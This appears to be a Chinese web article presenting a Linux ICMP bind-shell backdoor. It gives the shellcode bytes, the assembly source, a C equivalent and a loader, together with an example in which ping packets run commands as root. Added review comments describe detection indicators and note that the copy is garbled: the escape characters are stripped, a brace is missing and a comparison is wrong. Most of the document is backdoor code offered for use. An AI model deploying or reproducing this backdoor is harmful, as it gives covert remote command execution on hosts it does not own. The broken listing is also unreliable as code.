在不少协议的应用中都存在着一些后门。例如我们今天将要介绍的Linux ICMP后门。那么下面我们就来详细看一下关于137字节的Linux远程ICMP后门的具体内容。使用Ping控制程序:
/*
x86 linux icmp bind shellcode (137 bytes) by gloomy@netric.org
[example]
main:/home/gloomy/security/shellcode/linux/icmp# ./icmp
Size of shellcode = 137
main:/home/gloomy/security/shellcode/linux/icmp# ping -p 992f7573722f62696e2f69643e6f7574 -c 1 -s 26 localhost
PATTERN: 0x992f7573722f62696e2f69643e6f7574 (x99/usr/bin/id>out)
34 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.5 ms
main:/home/gloomy/security/shellcode/linux/icmp# cat out
uid=0(root) gid=0(root) groups=0(root)
main:/home/gloomy/security/shellcode/linux/icmp#
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
/* Trigger byte (0x99 in the assembly below) and the pre-assembled payload.
 * NOTE(review): in this listing the backslashes of the "\x.." escapes are
 * missing, so as printed the array holds literal text rather than the
 * 137 bytes the header comment describes; the page is a garbled copy and
 * does not behave as the example session shows. */
#define SECRET_CHAR "x99"
/* Byte form of asm_code() below, followed by the "/bin/sh -c" string that
 * the final execve() splits into argv[0] and argv[1]; c_code() below is
 * the readable C equivalent of the same syscall sequence. */
char shell[] =
"x31xc0x31xdbx31xc9xb0x66"
"x43x41x51xb1x03x51x49x51"
"x89xe1xcdx80x89xc2xb0x02"
"xcdx80x31xdbx39xc3x75x55"
"x31xc0x31xdbxb0x10x50xb0"
"xffx54x54x53x50x55x52x89"
"xe1xb0x66xb3x0cxcdx80x89"
"xe9x01xc1x31xc0x88x41xfe"
"xb0x25x01xc5xb0" SECRET_CHAR
"x32x45xffx75xd5xb0x02xcd"
"x80x31xdbx39xc3x74x25xeb"
"xc9x31xc0x31xdbxb3x02xb0"
"x06xcdx80x5bx89xd9x88x43"
"x07x80xc1x08x50x55x51x53"
"x89xe1x99xb0x0bxcdx80x31"
"xc0x40xcdx80xe8xd8xffxff"
"xff"
"/bin/sh -c";
/*
 * Assembly source that the shell[] byte string was generated from; the C
 * equivalent is c_code() below. Read from a defender's side, the observable
 * behaviour is:
 *   - socket(2, 3, 1): a raw ICMP socket (PF_INET / SOCK_RAW / IPPROTO_ICMP),
 *     which needs CAP_NET_RAW, i.e. the process already runs as root.
 *   - fork(): the parent exits, the child stays resident in endlessloop.
 *   - recvfrom() into the buffer at %ebp, then one byte at a fixed offset
 *     (0x25 - 1 = 36) is XORed against 0x99 (SECRET_CHAR); on a match it
 *     forks again and the child close()s fd 2 and execve()s
 *     "/bin/sh" "-c" <received data>, with the "/bin/sh -c" string split
 *     in place by writing a NUL over its 8th byte.
 * Host-side indicators: a long-lived process holding a raw ICMP socket that
 * occasionally spawns /bin/sh; network-side, ICMP echo requests whose
 * payload carries shell command text.
 * NOTE(review): a C string literal cannot span lines unescaped, so the
 * line-continuation backslashes appear to have been lost in this copy just
 * like the \x escapes above; the block documents the bytes rather than
 * building as shown.
 */
void asm_code() {
__asm("
xorl %eax,%eax
xorl %ebx,%ebx
xorl %ecx,%ecx
movb $0x66,%al
incl %ebx
incl %ecx
push %ecx
movb $0x3,%cl
push %ecx
decl %ecx
push %ecx
movl %esp,%ecx
int $0x80 /* socket(); */
movl %eax,%edx
movb $0x2,%al
int $0x80 /* fork(); */
xorl %ebx,%ebx
cmpl %eax,%ebx
jne exit
endlessloop:
xorl %eax,%eax
xorl %ebx,%ebx
movb $0x10,%al
push %eax
movb $0xff,%al
push %esp
push %esp
push %ebx
push %eax
push %ebp
push %edx
movl %esp,%ecx
movb $0x66,%al
movb $0x0c,%bl
int $0x80 /* recvfrom(); */
movl %ebp,%ecx
addl %eax,%ecx
xorl %eax,%eax
movb %al,-2(%ecx)
movb $0x25,%al
addl %eax,%ebp
movb $0x99,%al /* SECRET_CHAR */
xorb -1(%ebp),%al
jnz endlessloop
movb $0x2,%al
int $0x80 /* fork(); */
xorl %ebx,%ebx
cmpl %eax,%ebx
je stack
jmp endlessloop
execve:
xorl %eax,%eax
xorl %ebx,%ebx
movb $0x2,%bl
movb $0x6,%al
int $0x80 /* close(); */
pop %ebx
movl %ebx,%ecx
movb %al,0x7(%ebx)
addb $0x8,%cl
push %eax
push %ebp
push %ecx
push %ebx
movl %esp,%ecx
cdq
movb $0xb,%al
int $0x80 /* execve(); */
exit:
xorl %eax,%eax
incl %eax
int $0x80 /* exit(); */
stack:
call execve
.string "/bin/sh -c"
");
}
/*
 * C reference for the shellcode: the same syscall sequence as asm_code().
 * Points a reviewer or responder should take from it:
 *   - socket(2,3,1) is AF_INET / SOCK_RAW / IPPROTO_ICMP: every ICMP packet
 *     the host receives is delivered here, and for IPv4 raw sockets the
 *     kernel hands over the IP header as well, which is why the trigger is
 *     read at a fixed offset (buf[36]) and the command text is taken from
 *     the bytes right after it (&buf[37]).
 *   - After fork() the parent exits, leaving a resident child with no
 *     listening TCP/UDP port, so port scans and `ss -l` do not show it;
 *     a raw ICMP socket in /proc/net/raw, or auditing socket() calls with
 *     SOCK_RAW, does.
 *   - On a match the child closes fd 2 (stderr) and runs
 *     "/bin/sh -c <payload>" with a NULL environment; output only leaves
 *     the host if the command itself redirects it (see "id>out" in the
 *     header example).
 * NOTE(review): SECRET_CHAR is a string literal in this listing, so the
 * (char) cast below compares against a truncated pointer value, not the
 * 0x99 byte the assembly checks — consistent with the escapes having been
 * stripped from the page.
 */
void c_code() {
int fd;
int nb = 0;
struct sockaddr_in them;
int them_size = sizeof(struct sockaddr);
char buf[256];
char *prog[] = {"/bin/sh","-c",&buf[37],NULL}; /* argv: command text follows the trigger byte */
fd = socket(2,3,1); /* AF_INET, SOCK_RAW, IPPROTO_ICMP — requires CAP_NET_RAW */
if (fork() > 0) exit(0); /* parent exits; child lingers in the background */
while (1) {
while (!(nb = recvfrom(fd,buf,255,0,(struct sockaddr *)&them,&them_size))); /* block until a datagram arrives */
buf[nb-1] = 0; /* terminate the received data by overwriting its last byte */
if (buf[36] == (char)SECRET_CHAR) /* trigger check at a fixed offset in the packet */
if (fork() == 0) { close(2); execve(prog[0],prog,NULL); } /* child: stderr closed, then /bin/sh -c <payload> */
}
}
/*
 * Loader: prints the payload length, then transfers control into the
 * shell[] array by casting it to a function pointer. That only works where
 * the data segment is executable; with NX / W^X enforced the indirect call
 * faults, which is the usual reason this style of loader is caught today.
 * NOTE(review): the closing brace of main() is missing from this listing,
 * and the "%dnn" format looks garbled in the same way as the escapes above.
 */
int main(int c,char *v[]) {
void (*i)();
i = (void (*)())shell; /* treat the byte array as code */
fprintf(stderr,"Size of shellcode = %dnn",strlen(shell));
i();
return 0;
那么,Linux ICMP后门的具体代码我们就呈现出来了。